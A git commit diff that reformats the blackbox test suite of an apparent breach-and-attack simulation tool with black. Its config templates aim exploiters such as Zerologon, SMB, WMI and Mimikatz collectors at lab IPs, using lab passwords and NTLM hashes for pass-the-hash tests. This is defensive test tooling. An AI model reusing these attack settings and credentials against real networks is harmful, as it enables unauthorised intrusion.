Merge branch 'paint-it-black' into develop

Resolves #1070
This commit is contained in:
Mike Salvatore 2021-04-06 17:42:21 -04:00
commit 661f3907a9
493 changed files with 9615 additions and 7228 deletions

View File

@ -24,7 +24,7 @@ install:
# Python
- pip freeze
- pip install -r monkey/monkey_island/requirements.txt # for unit tests
- pip install flake8 pytest pytest-cov isort # for next stages
- pip install black flake8 pytest pytest-cov isort # for next stages
- pip install coverage # for code coverage
- pip install -r monkey/infection_monkey/requirements.txt # for unit tests
- pip install pipdeptree
@ -60,6 +60,9 @@ script:
## Check import order
- python -m isort ./monkey --settings-file ./ci_scripts/isort.cfg
## Check that all python is properly formatted. Fail otherwise.
- python -m black --check .
## Run unit tests and generate coverage data
- cd monkey # This is our source dir
- python -m pytest --cov=. # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.

View File

@ -16,3 +16,4 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- `mongo_key.bin` file location can be selected at runtime. #994
- Monkey agents are stored in the configurable data_dir when monkey is "run
from the island". #997
- Reformatted all code using black. #1070

View File

@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod
class Analyzer(object, metaclass=ABCMeta):
@abstractmethod
def analyze_test_results(self) -> bool:
raise NotImplementedError()

View File

@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run."
class AnalyzerLog(object):
def __init__(self, analyzer_name):
self.contents = LOG_INIT_MESSAGE
self.name = analyzer_name

View File

@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
class CommunicationAnalyzer(Analyzer):
def __init__(self, island_client, machine_ips):
self.island_client = island_client
self.machine_ips = machine_ips
@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer):
return all_monkeys_communicated
def did_monkey_communicate_back(self, machine_ip):
query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}}
return len(self.island_client.find_monkeys_in_db(query)) > 0

View File

@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__)
class PerformanceAnalyzer(Analyzer):
def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
def __init__(
self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]
):
self.performance_test_config = performance_test_config
self.endpoint_timings = endpoint_timings

View File

@ -3,19 +3,25 @@ from pprint import pformat
import dpath.util
from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH
from common.config_value_paths import (
USER_LIST_PATH,
PASSWORD_LIST_PATH,
NTLM_HASH_LIST_PATH,
LM_HASH_LIST_PATH,
)
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
# Query for telemetry collection to see if password restoration was successful
TELEM_QUERY = {'telem_category': 'exploit',
'data.exploiter': 'ZerologonExploiter',
'data.info.password_restored': True}
TELEM_QUERY = {
"telem_category": "exploit",
"data.exploiter": "ZerologonExploiter",
"data.info.password_restored": True,
}
class ZerologonAnalyzer(Analyzer):
def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]):
self.island_client = island_client
self.expected_credentials = expected_credentials
@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer):
@staticmethod
def _get_relevant_credentials(config: dict):
credentials_on_island = []
credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH))
return credentials_on_island
def _is_all_credentials_in_list(self,
all_creds: List[str]) -> bool:
def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool:
credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds]
self._log_creds_not_gathered(credentials_missing)
return not credentials_missing
@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer):
def _log_credential_restore(self, telem_list: List[dict]):
if telem_list:
self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials "
"were successfully restored.")
self.log.add_entry(
"Zerologon exploiter telemetry contains indicators that credentials "
"were successfully restored."
)
else:
self.log.add_entry("Credential restore failed or credential restore "
"telemetry not found on the Monkey Island.")
self.log.add_entry(
"Credential restore failed or credential restore "
"telemetry not found on the Monkey Island."
)
self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}")

View File

@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate):
"basic.exploiters.exploiter_classes": [],
"basic_network.scope.local_network_scan": False,
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
"internal.monkey.system_info.system_info_collector_classes":
["EnvironmentCollector", "HostnameCollector"],
"monkey.post_breach.post_breach_actions": []
"internal.monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
],
"monkey.post_breach.post_breach_actions": [],
}

View File

@ -2,7 +2,6 @@ from abc import ABC, abstractmethod
class ConfigTemplate(ABC):
@property
@abstractmethod
def config_values(self) -> dict:

View File

@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Drupal(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
"basic.exploiters.exploiter_classes": ["DrupalExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.28"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.28"],
}
)

View File

@ -8,8 +8,10 @@ class Elastic(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
}
)

View File

@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["HadoopExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"],
}
)

View File

@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Mssql(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.16"],
"basic.credentials.exploit_password_list": ["Password1!",
"basic.credentials.exploit_password_list": [
"Password1!",
"Xk8VDTsC",
"password",
"12345678"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"]
})
"12345678",
],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
}
)

View File

@ -3,14 +3,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Performance(ConfigTemplate):
config_values = {
"basic.credentials.exploit_password_list": ["Xk8VDTsC",
"basic.credentials.exploit_password_list": [
"Xk8VDTsC",
"^NgDvY59~8",
"Ivrrw5zEzs",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz"],
"t67TC5ZDmz",
],
"basic.credentials.exploit_user_list": ["m0nk3y"],
"basic.exploiters.exploiter_classes": ["SmbExploiter",
"basic.exploiters.exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
@ -21,16 +24,20 @@ class Performance(ConfigTemplate):
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter",
"ZerologonExploiter"],
"basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30",
"ZerologonExploiter",
],
"basic_network.network_analysis.inaccessible_subnets": [
"10.2.2.0/30",
"10.2.2.8/30",
"10.2.2.24/32",
"10.2.2.23/32",
"10.2.2.21/32",
"10.2.2.19/32",
"10.2.2.18/32",
"10.2.2.17/32"],
"basic_network.scope.subnet_scan_list": ["10.2.2.2",
"10.2.2.17/32",
],
"basic_network.scope.subnet_scan_list": [
"10.2.2.2",
"10.2.2.3",
"10.2.2.4",
"10.2.2.5",
@ -50,5 +57,6 @@ class Performance(ConfigTemplate):
"10.2.2.21",
"10.2.2.23",
"10.2.2.24",
"10.2.2.25"]
"10.2.2.25",
],
}

View File

@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class ShellShock(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.8"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
}
)

View File

@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class SmbMimikatz(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
"monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
"ProcessListCollector",
"MimikatzCollector"]
})
"MimikatzCollector",
],
}
)

View File

@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate):
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SMBFinger",
"PingScanner",
"HTTPFinger"],
"internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e",
"50c9987a6bf1ac59398df9f911122c9b"]
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
"internal.classes.exploits.exploit_ntlm_hash_list": [
"5da0889ea2081aa79f6852294cba4a5e",
"50c9987a6bf1ac59398df9f911122c9b",
],
}

View File

@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Ssh(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SSHExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.11",
"10.2.2.12"],
"basic.credentials.exploit_password_list": ["Password1!",
"12345678",
"^NgDvY59~8"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SSHFinger",
"PingScanner",
"HTTPFinger"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"],
"basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"],
}
)

View File

@ -8,7 +8,9 @@ class Struts2(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
}
)

View File

@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Tunneling(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
"basic.exploiters.exploiter_classes": ["SmbExploiter",
"WmiExploiter",
"SSHExploiter"
],
"basic_network.scope.subnet_scan_list": ["10.2.2.9",
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"],
"basic_network.scope.subnet_scan_list": [
"10.2.2.9",
"10.2.1.10",
"10.2.0.11",
"10.2.0.12"],
"10.2.0.12",
],
"basic_network.scope.depth": 3,
"internal.general.keep_tunnel_open_time": 180,
"basic.credentials.exploit_password_list": ["Password1!",
"basic.credentials.exploit_password_list": [
"Password1!",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz",
"12345678"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SSHFinger",
"12345678",
],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": [
"SSHFinger",
"PingScanner",
"HTTPFinger",
"SMBFinger"]
})
"SMBFinger",
],
}
)

View File

@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"],
}
)

View File

@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class WmiMimikatz(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["WmiExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.14",
"10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!",
"Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
"ProcessListCollector",
"MimikatzCollector"]
})
"MimikatzCollector",
],
}
)

View File

@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.25"],
# Empty list to make sure ZeroLogon adds "Administrator" username
"basic.credentials.exploit_user_list": []
})
"basic.credentials.exploit_user_list": [],
}
)

View File

@ -2,25 +2,37 @@ import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
parser.addoption("--no-gcp", action="store_true", default=False,
help="Use for no interaction with the cloud.")
parser.addoption("--quick-performance-tests", action="store_true", default=False,
parser.addoption(
"--island",
action="store",
default="",
help="Specify the Monkey Island address (host+port).",
)
parser.addoption(
"--no-gcp",
action="store_true",
default=False,
help="Use for no interaction with the cloud.",
)
parser.addoption(
"--quick-performance-tests",
action="store_true",
default=False,
help="If enabled performance tests won't reset island and won't send telemetries, "
"instead will just test performance of already present island state.")
"instead will just test performance of already present island state.",
)
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def island(request):
return request.config.getoption("--island")
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def no_gcp(request):
return request.config.getoption("--no-gcp")
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def quick_performance_tests(request):
return request.config.getoption("--quick-performance-tests")

View File

@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class IslandConfigParser:
@staticmethod
def get_raw_config(config_template: Type[ConfigTemplate],
island_client: MonkeyIslandClient) -> str:
def get_raw_config(
config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient
) -> str:
response = island_client.get_config()
config = IslandConfigParser.apply_template_to_config(config_template, response['configuration'])
config = IslandConfigParser.apply_template_to_config(
config_template, response["configuration"]
)
return json.dumps(config)
@staticmethod
def apply_template_to_config(config_template: Type[ConfigTemplate],
config: dict) -> dict:
def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict:
for path, value in config_template.config_values.items():
dpath.util.set(config, path, value, '.')
dpath.util.set(config, path, value, ".")
return config
@staticmethod
def get_ips_of_targets(raw_config):
return dpath.util.get(json.loads(raw_config),
"basic_network.scope.subnet_scan_list",
'.')
return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".")

View File

@ -8,9 +8,9 @@ from bson import json_util
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
MONKEY_TEST_ENDPOINT = 'api/test/monkey'
TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry'
LOG_TEST_ENDPOINT = 'api/test/log'
MONKEY_TEST_ENDPOINT = "api/test/monkey"
TELEMETRY_TEST_ENDPOINT = "api/test/telemetry"
LOG_TEST_ENDPOINT = "api/test/log"
LOGGER = logging.getLogger(__name__)
@ -44,7 +44,7 @@ class MonkeyIslandClient(object):
@staticmethod
def monkey_ran_successfully(response):
return response.ok and json.loads(response.content)['is_running']
return response.ok and json.loads(response.content)["is_running"]
@avoid_race_condition
def kill_all_monkeys(self):
@ -65,37 +65,41 @@ class MonkeyIslandClient(object):
def find_monkeys_in_db(self, query):
if query is None:
raise TypeError
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
def find_telems_in_db(self, query: dict):
if query is None:
raise TypeError
response = self.requests.get(TELEMETRY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
def get_all_monkeys_from_db(self):
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(None))
response = self.requests.get(
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None)
)
return MonkeyIslandClient.get_test_query_results(response)
def find_log_in_db(self, query):
response = self.requests.get(LOG_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
@staticmethod
def form_find_query_for_request(query: Union[dict, None]) -> dict:
return {'find_query': json_util.dumps(query)}
return {"find_query": json_util.dumps(query)}
@staticmethod
def get_test_query_results(response):
return json.loads(response.content)['results']
return json.loads(response.content)["results"]
def is_all_monkeys_dead(self):
query = {'dead': False}
query = {"dead": False}
return len(self.find_monkeys_in_db(query)) == 0
def clear_caches(self):

View File

@ -8,8 +8,10 @@ import requests
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
NO_AUTH_CREDS = (
"55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062"
"8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557"
)
LOGGER = logging.getLogger(__name__)
@ -18,10 +20,12 @@ class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
self.token = self.try_get_jwt_from_server()
self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
self.supported_request_methods = {
SupportedRequestMethod.GET: self.get,
SupportedRequestMethod.POST: self.post,
SupportedRequestMethod.PATCH: self.patch,
SupportedRequestMethod.DELETE: self.delete}
SupportedRequestMethod.DELETE: self.delete,
}
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
response = self.send_request_by_method(url, method, data)
@ -44,7 +48,10 @@ class MonkeyIslandRequests(object):
return self.get_jwt_from_server()
except requests.ConnectionError as err:
LOGGER.error(
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(
err, self.addr
)
)
assert False
class _Decorators:
@ -59,45 +66,45 @@ class MonkeyIslandRequests(object):
return request_function_wrapper
def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth", # noqa: DUO123
resp = requests.post(
self.addr + "api/auth", # noqa: DUO123
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False)
verify=False,
)
return resp.json()["access_token"]
@_Decorators.refresh_jwt_token
def get(self, url, data=None):
return requests.get(self.addr + url, # noqa: DUO123
return requests.get(
self.addr + url, # noqa: DUO123
headers=self.get_jwt_header(),
params=data,
verify=False)
verify=False,
)
@_Decorators.refresh_jwt_token
def post(self, url, data):
return requests.post(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False)
return requests.post(
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def post_json(self, url, data: Dict):
return requests.post(self.addr + url, # noqa: DUO123
json=data,
headers=self.get_jwt_header(),
verify=False)
return requests.post(
self.addr + url, json=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def patch(self, url, data: Dict):
return requests.patch(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False)
return requests.patch(
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def delete(self, url):
return requests.delete( # noqa: DOU123
self.addr + url,
headers=self.get_jwt_header(),
verify=False)
self.addr + url, headers=self.get_jwt_header(), verify=False
)
@_Decorators.refresh_jwt_token
def get_jwt_header(self):

View File

@ -12,16 +12,16 @@ class MonkeyLog(object):
self.log_dir_path = log_dir_path
def download_log(self, island_client):
log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])})
if not log:
LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0]))
return False
else:
self.write_log_to_file(log)
return True
def write_log_to_file(self, log):
with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file:
log_file.write(MonkeyLog.parse_log(log))
@staticmethod
@ -32,7 +32,7 @@ class MonkeyLog(object):
@staticmethod
def get_filename_for_monkey_log(monkey):
return "{}.txt".format(monkey['ip_addresses'][0])
return "{}.txt".format(monkey["ip_addresses"][0])
def get_log_path_for_monkey(self, monkey):
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))

View File

@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__)
class MonkeyLogParser(object):
def __init__(self, log_path):
self.log_path = log_path
self.log_contents = self.read_log()
def read_log(self):
with open(self.log_path, 'r') as log:
with open(self.log_path, "r") as log:
return log.read()
def print_errors(self):

View File

@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__)
class MonkeyLogsDownloader(object):
def __init__(self, island_client, log_dir_path):
self.island_client = island_client
self.log_dir_path = log_dir_path

View File

@ -5,7 +5,7 @@ import shutil
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
LOG_DIR_NAME = 'logs'
LOG_DIR_NAME = "logs"
LOGGER = logging.getLogger(__name__)
@ -18,8 +18,10 @@ class TestLogsHandler(object):
def parse_test_logs(self):
log_paths = self.download_logs()
if not log_paths:
LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?")
LOGGER.error(
"No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?"
)
return
TestLogsHandler.parse_logs(log_paths)

View File

@ -5,13 +5,10 @@ from time import sleep
import pytest
from typing_extensions import Type
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \
CommunicationAnalyzer
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import \
IslandConfigParser
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \
MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
@ -28,33 +25,51 @@ from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \
TestLogsHandler
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import \
MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \
MapGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation import \
ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
ReportGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \
TelemetryPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import (
MapGenerationFromTelemetryTest,
)
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import (
ReportGenerationFromTelemetryTest,
)
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
TelemetryPerformanceTest,
)
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
DEFAULT_TIMEOUT_SECONDS = 5 * 60
MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25',
'drupal-28']
GCP_TEST_MACHINE_LIST = [
"sshkeys-11",
"sshkeys-12",
"elastic-4",
"elastic-5",
"hadoop-2",
"hadoop-3",
"mssql-16",
"mimikatz-14",
"mimikatz-15",
"struts2-23",
"struts2-24",
"tunneling-9",
"tunneling-10",
"tunneling-11",
"tunneling-12",
"weblogic-18",
"weblogic-19",
"shellshock-8",
"zerologon-25",
"drupal-28",
]
LOG_DIR_PATH = "./logs"
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
@pytest.fixture(autouse=True, scope="session")
def GCPHandler(request, no_gcp):
if not no_gcp:
GCPHandler = gcp_machine_handlers.GCPHandler()
@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp):
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
@pytest.fixture(autouse=True, scope="session")
def delete_logs():
LOGGER.info("Deleting monkey logs before new tests.")
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
@ -77,7 +92,7 @@ def wait_machine_bootup():
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
@pytest.fixture(scope='class')
@pytest.fixture(scope="class")
def island_client(island, quick_performance_tests):
island_client_object = MonkeyIslandClient(island)
if not quick_performance_tests:
@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests):
yield island_client_object
@pytest.mark.usefixtures('island_client')
@pytest.mark.usefixtures("island_client")
# noinspection PyUnresolvedReferences
class TestMonkeyBlackbox:
@staticmethod
def run_exploitation_test(island_client: MonkeyIslandClient,
def run_exploitation_test(
island_client: MonkeyIslandClient,
config_template: Type[ConfigTemplate],
test_name: str,
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS,
):
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
